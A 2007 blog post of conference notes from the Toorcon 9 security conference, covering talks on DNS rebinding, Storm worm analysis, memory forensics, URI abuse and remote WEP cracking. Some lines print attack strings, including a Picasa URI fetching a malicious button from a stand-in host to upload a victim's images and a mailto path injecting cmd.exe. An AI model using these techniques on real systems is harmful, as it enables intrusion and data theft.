Toorcon 9 Computer Security Conference (2007)
By Danx-Oracle on Oct 21, 2007
Toorcon is an annual computer security conference held in San Diego, California
at the San Diego Convention Center on the Bay waterfront.
I'm told it's a cross between Black Hat (expensive, formal) and Defcon (cheap, rowdy), on a smaller scale.
Toorcon is also cheap and in my backyard.
Toorcon has many of out-of-town visitors, many from greater LA and even the SF Bay area.
There were two track sessions, so I didn't catch everything, and I didn't take notes for all sessions.
These notes are mine, so I may have missed something or made mistakes.
In the past Toorcon presentations were posted online at the Toorcon website.
For last year's conference, videos are available at the website.
DVDs of this year's presentations were on sale onsite,
so they may be made available online sometime.
- Slirpie (Client-side attack software)
- Hard Drive/Flash Drive Recovery
- Data Flow Analysis
- Exposing Stormworm
- BitBlender (BitTorrent privacy layer)
- Wifi Hotspot Analysis
- Live Memory Forensics
- Teaching Hacking at College
- Context-keyed Payload Encoding
- Privilege-Centric Security Analysis
- URI Use and Abuse
- Caffe Latte with a Free Topping of Cracked WEP
- The Talk Talk
- They're Hacking Our Clients! Why Are We Only Vuln Assessing Servers?
Background The web is intended for linking everything to everything. It doesn't work every well with mixed zones like Internet and Intranet or with email on the web. The exploit described here uses an old technique called "DNS Rebinding". This was first found in 1996 (called the "Princeton Attack"), but has since been forgotten. DNS rebinding works by changing the webserver's IP address so the webserver thinks it's dealing with the same webserver and drops its defense mechanisms.
The web works by embedding links from everywhere, not just one website ("late binding" when the webpage is rendered). Web security is based on a "look but don't touch" policy between objects from different web servers. If the IP address changes for a web hostname, this is defeated. For example, www.foo.com has access to www.foo.com. Can change the IP address of www.foo.com with DNS rebinding and the webclient still acts like it's the same site.
Webservers are now locked down pretty well with firewalls. But web clients (browsers) are still vulnerable. You can use a web client effectively as a router to bounce off traffic from an internal Intranet network. All you have to do is to lure someone to view a Flash video that has the malicious payload. Dan's point is since servers are locked down so much, the easiest target are clients (usually web browsers).
Large websites typically have multiple IP addresses. This is for load balancing and for distributing webservers throughout the world. Web clients access web services with plugins. Plugins provide sockets. Flash plugins provide sockets to an Internal network. Java plugins provide sockets back to a webserver (which can be switched to a special proxy via DNS rebinding).
DNS Rebinding: There's 3 ways to do it: Temporal, Spatial, and with a CNAME alias:
- Temporal: use a 0 TTL on DNS requests so they expire immediately, then your DNS server immediately switches to your host (initially, say www.foo.com can point to something at Yahoo, then switch to your hostile webserver
- Spatial: a DNS reply can return multiple DNS records for a query—the first is to a legitimate site, then the next is to your attack site
- DNS CNAME alias allows a hostname to point to another hostname. Has the benefit of immediately expiring the TTL that may have been previously present
How can Slirpie be used? One method is with this socket, you can say get a ssh connection and use PPTP socket (used with VPN) to obtain general network access. Other scenarios are possible.
- Flash: needs to remove the ability to make arbitrary TCP connections. Dan talked to them and it looks like they may do that.
- Browsers (MSIE, Firefox) probably are broken forever as the fix will break the web as it's currently widely-used. Cross site scripting is used extensively, including by Google and Yahoo.
Mitigations No fixes? Here's some partial measures:
- Check hostname sent to webserver by client in HTTP header. Webserver needs to change. Works most of the time. Breaks down in two cases:
- Widely-shared virtual webservers that hosts hundreds or thousands of sites (say, Akamai).
- Embedded dumb devices that don't know what their hostname is (say, a printer)
- Stop or prevent external Internet to internal Intranet linking
Solutions The real problem is stopping a web client from being used as a generic router. The solution isn't in the Network layer (Level 3) of the TCP/IP protocol, but higher up. So the fix is not, for example, IPSec or IPv6. Using SSL (https) should help a lot and Dan predicts almost every website will be using SSL 10 years from now. The real fix Examine Public to private network connectivity.
Exploit with MS Internet Explorer Only Dan briefly explained another attack using MSIE (the above only works with Firefox). To take over and spoof a TCP/IP connection you need to the next sequence number, otherwise the packet will be discarded. An ActiveX control provides sequence numbers for packets and that can be sent to an external proxy. The browser plugin can send a RST to the real server, to halt the competing légitimité connection, then spoof the connection since it knows the next sequence number. The external proxy can now send fake packets and spomf the original connection.
Hard Drive/Flash Drive Recovery by Scott Moulton
Scott Moulton of MyHardDriveDied.com. This was a popular talk about disk drives (HDs) and solid state drives.
- Heads are a problem when hard drives (HDs) drop. Modern HDs automatically park when powered off. Some HDs have an accelerometer to park the head, which works most of the time, but not always.
- HDs hae two bad block lists—one is static (B-list), which are bad blocks detected in the factory. Another is the "Growing" list or G-list.
- Solid state drives just can't be read directly. They have some unknown format, so it's not possible yet to recover deleted files (undelete) from slash drives like it is from hard drives (this excludes software "trash cans").
- OS partitions always start on cylinder boundaries—this makes it easier and faster to scan and recover.
- 3-4TB HDs now available—320GB for laptops. Modern HDs also have a higher proportion bad sectors
- If head isn't damaged, can "image" drive—do recovery later on another copy. Better, but slower to image in reverse to bypass disk caching (and void bad blocks you may not care about).
- Platters, if more than one, are written to at the same time (as all heads move together), so they must stay aligned to recover (can't remove them as you lose alignment). HD click is caused by "SA" (System Area) can't be read (it isn't the head or arm). If head is bad, can just replace it. Can also replace other parts other than the platters (with a "donor drive" from, say, ebay).
Data Flow Analysis
Richard Johnson, Microsoft Research, talked about the Phoenix Compiler Framework and its use in Data Flow Analysis for security tools. generates an intermediate code, Intermediate Representation (IR) for optimization, code coverage testing, and security analysis. Multiple levels of IR, High-level (source-like) to Low-level (assembler-like). Can retarget to different machine architectures. Control flow graphs provide a visual representation of where code flows. Detects loops automatically (non-trivial).
For security, can use program analysis. That is model inference (data structures or program interaction), and vulnerability detection. For static security analysis, use data flow analysis from outputs (instead of the more-typical analysis from inputs)
- Can analyze if input to an Internet-facing software is all sanitized
- Can generate type definitions for fuzzer tools (random input generators)
- What client/server components may be talking to each other
- Buffer overflows
- Endless loops
More info: Phoenix SDK Software can be downloaded from http://research.microsoft.com/phoenix . Good references for static analysis in general are Dawson Engler (can download MIT classes), David Wagner, & Cousot.
Exposing Stormworm by Brandon Enright, UCSD. This presentation and data are at the bottom of his webpage. Brandon specializes in large-scale network discovery and host tracking and contributes to Nmap software. Stormworm is malware for use by mafia-style organized crime to make money (probably Russian). Aka "Storm Worm" or "Storm." Brandon calls it Storm as it's not really a worm. Common estimates in the press are usually wrong. Storm was first noticed January 2007 with spam about a storm in Europe. Nearly unstoppable because it's distributed (no centralized C&C like earlier botnets. Storm Storm doesn't connect with a server, but a proxy (another zombie) that talks to a distributed server. Usually used for:
- "Pump and Dump" stock spam. This is the most common and lucrative. It's where some criminal buys stock, then drives the stock price up with the spam. Enough people (suckers) receiving the spam believe it buy the stock, driving up prices. This is very profitable and pre-laundered money
- Phishing email (not as lucrative as Pump and Dump)
- DDos against targeted groups and organizations (political)
- Automatic DDoS of researchers probing Storm proxies
Multiple attack vectors, such as PDF with embedded images. Storm malware originally was MS Windows kernel drivers, with several generations of improvements. Now a user-land program with more flexibility (no root kit needed).
Framework Storm uses Overnet, a Distributed Hash Table (DHT) network protocol. Uses a OID (128 bits) to identify a node. DHT computes the distance between two nodes by XORing their hashes. This quickly finds nearby peers. Then it does the same with adjacent peers. This finds a nearby copy of desired content.
Network is very dynamic with peers coming and going and changing OIDs all the time. Peers must periodically search for themselves to find nearby peers.
This protocol and also be used to easily crawl the entire Storm network. Can model the Storm network as a directed graph (digraph), even though Storm is a peer-to-peer hash network. The digraph is modeled on discovery rounds.
Message overhead is from connect, search, and publicize. "Connect" includes advertising itself and receiving a peer list, "search" is finding nearby content, and "publicize" is advertising content (latter isn't really needed).
Stormdrain Brandon built a crawler in Perl, Stormdrain, which needs only a small subset of Storm functionality. Discussed Stormdrain optimizations, such as not using Java (wastes memory), handle dead host connections, etc. Stormdrain uses a state machine (live, active, dead, removed, unknown) to figure out the network, which is very large. Active means node sent data to Stormdrain.
Showed a graphs of nodes over time. Microsoft made a noticeable dent in Storm with its periodic update to MRT (Malicious Software Removal Tool)—the Storm (Nuwar) release. Brandon estimates 15 million machines have been infected at some point (many are detected and removed, never become active, or held at bay with a firewall). Number of nodes have declined recently.
Encryption is easy to figure out (done by another researcher). 40-bit key, but know large parts of plain text (such as node ID and IP address).
Other researchers are analyzing in other ways, such as "Follow the money"—see who's buying and selling the stock that's being advertised. Brandon is just doing a technical analysis.
BitBlender by Damon McCoy
BitBlender provides a privacy layer for BitTorrent, a peer to peer network which provides large file downloads, such as iso images (both legal and not legal). BitBlender was written by Kevin Bauer and Damon McCoy, PhD candidates at University of Colorado at Boulder, Computer and Communications Security Center. A more-complete presentation is at Bit Blender.
Protects against MPAA and RIAA evidence gathering (they are often confused about who to go after and they often go after the BitTorrent exit node, not the entry node, which requests the file.)
- Low ovehead—no expensive cryptography
- Plausible deniability (k-anonymity)
- Tunable anonymity
- "k-anonymity" means a user is indistinguishable among a set of k users (e.g., k=8 users).
- "Blender" - a directory server organizes anonymous torrent and "mix peers"
- "Mix peers" asks for the same piece from multiple peers. This provides plausible deniability. For example with 6 normal peers (who really want the traffic) and 3 mix peers (who don't), then k=9.
Wifi Hotspot Analysis
Hotspot Analysis by Richard Rushing, AirDefense, Inc. analyses what services and sites are used at hotspots, and password strength.
- "Hotspot in a box", no security, 1 or a few nodes
- Large hotspots. No firewall. Might have security
- "Secure" hotspots with a firewall. Might have security
Stats: 1618 total clients
- Operating System: 30% Win XP, 12% Win 2000, Win9x 12%, Mac 8%, Linux 4%, unknown OS 34%
- 28% of clients have no firewall protection
- 3% of clients had malware
- Recent surge in VOIP phones on hotspots
- 24% of clients do nothing while connected to hotspot
- Passwords: good passwords now (people listen): 78% strong, but most sent over clear text to websites! Some (12 clients) use pop3 with cleartext passwords, with Outlook Express.
- 184 hotspots analyzed over 2 years (including 4 genuine "fake" hotspots, where someone is trying to steal information)
- Can sometimes see point of sales nodes on store and hotel networks. Hotel networks usually the worse, for inappropriate devices on network. May be on a different subnet, which doesn't provide real security.
- Over 85% of hotspots use NAT
- Firewall useless because peers (other customers) can be dangerous
- Tmobile pay-hotspots uses phone number as userid and the default 4-digit password is the last 4 digits of their SSN (often not changed)
- Less than 5% use 802.1X (enterprise-level authentication)
- Large hotspots most insecure. Most dangerous spots hotels, airports, convention centers
- Fake hotspots use the same SSID as the genuine hotspot in the same area and emulate it by asking for ID and password in the same manner
- Client isolation in a hotspot neetwork is not always turned on
- DNS owned by hotspot—cause for mischief by hotspot owner
- DHCP leaks previous hotspot IP address used by client
- Recommended book: Silence over the Wire by Michal Zalewski (No Starch Press)
Live Memory Forensics
Live Memory Forensics by datagram. Live forensics is examining memory image, as opposed to "dead forensics," which looks at a HD image. Live forensics can be done in software or hardware. Live forensics gets missing information not available from just "dead forensics," but supplements, not replaces, "dead forensics." As with dead forensics, live forensics analysis is done off-line.
Additional information gained by live forensics includes: kernel/modules, running processes, net connections, user logins, memory-mapped filesystems, and shell history. First thing to do is take a memory snapshot image, then analyze offline (can also dump HD image, "dead forensics", which takes longer and can be also done if needed).
- HW dumping: done with custom devices, DMA (bypasses OS with either PCI, PC card, USB, or firewire). Useless to lock workstation because of devices like this.
- SW dumping (more common): UNIX/Solaris /dev/mem, Linux /proc/kcore /dev/mem, OSX: /var/vm, /dev/mem\*, Windows; \\\\.\\PhysicalMemory\*.
dd if=/dev/mem of=memdump.img conv=noerror,sync
- Need a trusted toolkit for gathering info (tools need to be static binaries, gcc -static, as target may be compromised), write scripts, consider actions (changes things) and remember goals.
- Set $PATH
- nc/cryptcat data to remote system, use hash checksum (md5)
- Rootkit hunting: can be done with chkrootkit, rkhunter, Hunter.o (kernel mod), 99luftbaloons (new for TC9), manual inspection for rootkits ;-)
- string searching (strings -a -tx)
- Can look at shell history (available in tty driver, even if shell history file erased)
- Can look at files on memory-mapped filesystems
Teaching Hacking at College
By Sam Bowne, Community College of San Francisco (CCSF). Michael Lynn presented a Cisco vulnerability at Black Hat 2005, but lost job and was sued. This got Sam interesting in teaching a class on hacking. Sam's website samclass.info has everything online there.
Class based on Hands-on Ethical Hacking and Network Defense textbook. Projects in book are dull, but provided cover to officer class (CNIT 123).
Hands-on labs with man-in-the-middle attack, ARP poisoning, practice attack/defense. Useful even for professional netadmins. Lab network is isolated with a throttled upstream connection to 128Kb (can isolate totally, but such a drag to use). Criminals don't take classes, but good guys need to know and it needs to be in the open. Half of students are working professionals. Colleges still scared-to-death of this.
The course has basic network and security prereqs, no programming or exploit creation knowledge required. The course uses existing tools like "script kiddies". Each project shows vulnerability, attack, and defense.
- Metasploit takes over Windows 2K
- OS Nmap
- Rootkit Ubuntu Linux (and repair)
- Website hacking with HackThisSite.org. Website founder in prison because it worked "too well," but site is still live
- Port scan
- Stealing passwords
- password bypass (use live cd, recovery mode, or MS Windows boot cd)
Sam will be teaching a more-advanced class next semester. Taught summer class to a roomful of instructors after being invited by another college (but host college refused to put "hacking tools" in labs)
Context-keyed Payload EncodingContext-keyed Payload Encoding by |)ruid of the Computer Academic Underground. Payload encoding software consists of two parts an encoder to encode the payload and a decoder on another process to decode and use the payload (both on the same host machine). Metasploit software includes this functionality. Uses include hiding shell commands and user adds from security analyzers. The encoder encodes payload, and prepends a decoder stub, then decoded at other end.
Most encoders place the key in a stub as plaintext or doesn't even use a key. This makes it easier for security scanning software to view the payload in real time. The problem is how to relay the key without it being discovered in real time. The solution proposed here is "Contextual keying"—generates a key from context information. Contextual sources:
- Can profile application (memory map of static process memory) with smem-map
smem-map <pid> <output.map>
- Windows: msfpesscan --context-map <outdir> <files> (metasploit) scans static files (e.g., specific DLLs)
- Event data
- Temporal data (system time, uptime, WinNT SystemTime other counters), but can't change while using key (window has to be long enough, say > 1 second)
For proof of concept Metasploit's Shikata Ga Nai was extended to optionally use contextual keying. Encoding is a simple XOR with the key. This is easily defeated later (even the key can be discovered later), but the goal is only to defeat decoding in real time—to provide a hurdle, not a totla preventive.
Privilege-Centric Security Analysis
By Brenda Larcom, Intel Corp. (day job), founding member of Trike Development Team.
The intent is to model security-intended behavior and problems with respect to privilege. The model chains attacks with multiple vulnerabilities (links). Each attack link requires some privileges (on left), then provides some privileges (on right)—a "requires/provides" relationship. E.g. write to file —> view with PuTTY 0.53 —> execute arbitrary code.
Hooking up multiple attacks links (like this) into a chain can be automated. Privileges come from a limited number of places and have to be derived from somewhere. These are the places you look. Gather list of all components, with requires/provides relationships. Also have a limited users with elevated privileges.
No code yet, but creating relationships has already been used to find design flaws. Automatic generation of requires/provides relationships would be nice.
URI Use and AbuseURI Use and Abuse by Nathan McFeters, Ernst & Young Advanced Security Center, Houston, www.xs-sniper.com
Generic URIs include http://, ftp://, telnet://, etc. However, there's new app-specific uris such as aim://, firefoxurl://, picasa://, etc, that are registered with MS Windows. This new class of URI attacks is caused by access to application functionality from the web browser. Cross script scripting (XSS) can be used to do attack. Attacks include stack overflows, command injection, automated file transfer, etc.
Nathan wrote a tool called "DUH" that looks for Microsoft Registry keys that map a URI to a program, to find what program it's tied to.
Trillian, a chat client, uses aim:// Data is input directly in the aim:// URI A long string of anything will cause an overflow, and you can get a shell.
Cross Browser Scripting—IE pwn Firefox
Firefox has firefoxurl;// and navigatorurl:// registered—this was required to be MS Vista compliant, but these also make Firefox vulnerable to command injection when invoked from MS IE. So MS Vista compliance comes at a cost of making Firefox vulnerable!
Can pass Firefox command line arguments, such as -chrome
Another URI can execute an arbitrary MS Windows program
mailto:(some stuff)../../../../../../windows/system32/cmd".exe (anything).exe
Fix attempts: Firefox 220.127.116.11 (partial) 18.104.22.168 (still partial), 22.214.171.124 (fixed, sort of). MS updateds ShellExecute. However, other instances, such as stack overflow are still not fixed.
The root cause of the problem is application developers are creating lots of 3rd-party URIs, all of which are attack vectors. These apps can be invoked directly through the browser!
Proof of Concept Application: Trust-based Applet Attack against Google's Picasa (affectionately known as "T-bAG") This is a one-button click exploit (no patent). E.g., picasa://importbuttonurl=http://shadyshady.com/evilbutton.xml (downloads a button, with malware payload that uploads all your image files to a remote directory)
Uses DNS rebind (explained above with Slirpie) and Flash. Google's Picasa opens up its own instance of MSIE. Picasa starts its own webserver on the client. The Picasa webserver is only localhost accessible, but it can be circumvented with Flash (with DNS rebinding and ActionScript).
Firefox emulates the MS registry on \*nix (Linux, Solaris, Mac OS X, UNIX), so \*nix is not immune. (Personally, I think it's a problem with \*nix, but to a lesser degree—\*nix doesn't have as many URIs registered, as Firefox is not the OS and it's not as mandatory as with MS Windows—DEA).
Caffe Latte with a Free Topping of Cracked WEPThis talk, by Vivek Ramachandran of MD Sohail Ahmad, AirTight Networks, is about cracking WEP keys remotely by sniffing and probing laptops that were in a remote WEP-based wifi hot spot. For example, one can retrieve corporate WEP Keys from Road-Warriors at airports. www.airtightnetworks.net
History: Earliest WEP attacks in 2001. 2004 made simpler (500,000 packets needed to analyze and automatically crack the key), 2005 made more simple. By 2007 just need 60-90K packets to break WEP. These WEP attacks requires being in RF range of the WEP network (i.e., must be localized).
Remote WEP attacks: attacks may be made away from WEP network—just need isolated CLient that used to be in range of WEP network. MS Windows caches WEP key in its PNL (to save retyping).
A honey pot be built without knowledge of the key. Honey pot can answer probe requests, even though it can't read received packets (until the key is known), but it can send and reply to packets. Client might send DHCP client, and honey pot can connect, capture packets, disconnect and retry (to get more encrypted data packets). Eventually, enough packets are gathered to crack the key. However, this takes a long time (days).
A honeypot can spoof WEP connection (even though the honeypot can't decrypt packets it receives), but DHCP from the client will repeat requests until time out. Next, the client sends Gratuitous ARP packets. The honeypot can assume IP address is in the range 169.254.0.0 - 169.254.255.255 (only ~65K numbers—a standard IP private address range). Can brute force attack this small set of numbers. Honeypot can send ARP requests for all 65K addresses. Once we have about 80K arp packets, we can crack key.
We know large parts of the ARP request packet. Because of WEP weaknesses, we can replay received ARP packets with flipped bits to find wep key. Cracking the WEP key takes about 60K packets—takes only minutes.
- WEP can be cracked remotely—just need a client (laptop) that used to be connected to the target WEP network
- Remote WEP honeypots are now possible
- Similar tool WEPOff at www.darknet.org.uk does this, but does'nt use all the concepts here (not as efficient)
- More important to migrate to WPA/WPA2
- Should avoid public hotspots and switch wifi off when not used
- Assume WEP key will be cracked (build other defenses, such as VPN or SSL).
The Talk Talk
"The Talk Talk" covers giving presentations, by Strom Carlson. Strom is known for messing with a printing/shipping company smart cards that rhymes with Kedex/Finkos. Strom will cover: planning, preparing, giving talks, and after-talk.
Planning talk Must know audience (three types: someone interested but doesn't understand, geek or eats technical details, or business person who only cares about end result) Will usually get a blend of these three. Don't be afraid to start over if proposed topic doesn't work. Narrow topic down. Research (know topic thoroughly, take lots of notes, and document) Select a "Thesis Statement" (a single specific claim to argue, that is narrowed and focused, and is not the topic).
- Needs a structure: Intro (more than name), then 3-5 supporting arguments, then conclusion arguments)
- Supporting arguments are smaller, more-focused versions of the primary argument.
- Conclusion wraps up and ties back to primary argument. Give a take away.
- KISS principle "Keep It Simple, Stupid" Don't have a lot of time.
- Allow at least 5 minutes for Q & A.
- PowerPoint is not a talk—only helps a speaker conveying info. Don't have a lot of text—use the separate notes section for handout/download. Proofread slides.
- Live Demos can and will go horribly wrong—must be short and quick. Pacing through a series of screen shots is better (video is OK, if short/exciting)
- Slow down, enunciate, and relax
- Get away from lectern, use a slide advancer
- Use humor (but not too much) and pay attention to audience
- Q&A—give time for it and repeat questions
- Stick around after for more questions
They're Hacking Our Clients! Why Are We Only Vuln Assessing Servers?
Current practice is performing a "pen test" on a corporate network—that is, try to penetrate an internal from the outside. Once inside "internal" Intranet, it's really all "cake." The internal network is wide open and most internal apps never been audited and provide such things as file shares and credentials.
Now getting to internal network easier with client-side attacks, browsers, email clients, Acrobat, and MS Office. Client-side attacks are made easier now with Core IMPACT, Metasploit, or hostile attacker toolkits. Compromising clients is so easy that attackers need botnets to organize the overwhelming number of compromised clients. Even the largest organizations have no filters against botnets.
Social engineering is not the problem. Some exploits don't even require a click. Non-technical people should't have to understand vuln to read email. IT must train user, but also protect them from attack.
Over-focus on firewalls and servers. Easy to attack clients, as there are so many and you only need to pwn one.
Patch management tool not the solution—doesn't cover all products, not always accurate, and not everyone has one. Usually only MS software is patched by organizations.
Browser plugins added by users. Acrobat, Flash have many vulnerabilities.
A Proposed Client-Based Solution
Non-network software clients has a lot of metadata (author, app version, OS, etc). MS software has lots of metadata. This can be used to our advantage. Build a database of client software and versions with this metadata. See the Open Source Vulnerability Database A tool using this database, ClientVA (website www.clientva.org appears dead) shows vulnerable plugins for your client using this vuln db.
Building on this, a simple client-side Intrusion Protection System (IPS) should be possible on a web proxy (e.g., Squid).
Another Solution Thin clients on corporate networks should help avoid problem of several different configurations without outdated software. IT usually doesn't go there. Jay likes it, but IT doesn't usually go theree—perhaps it's complexity or network load or a unfamiliar concept.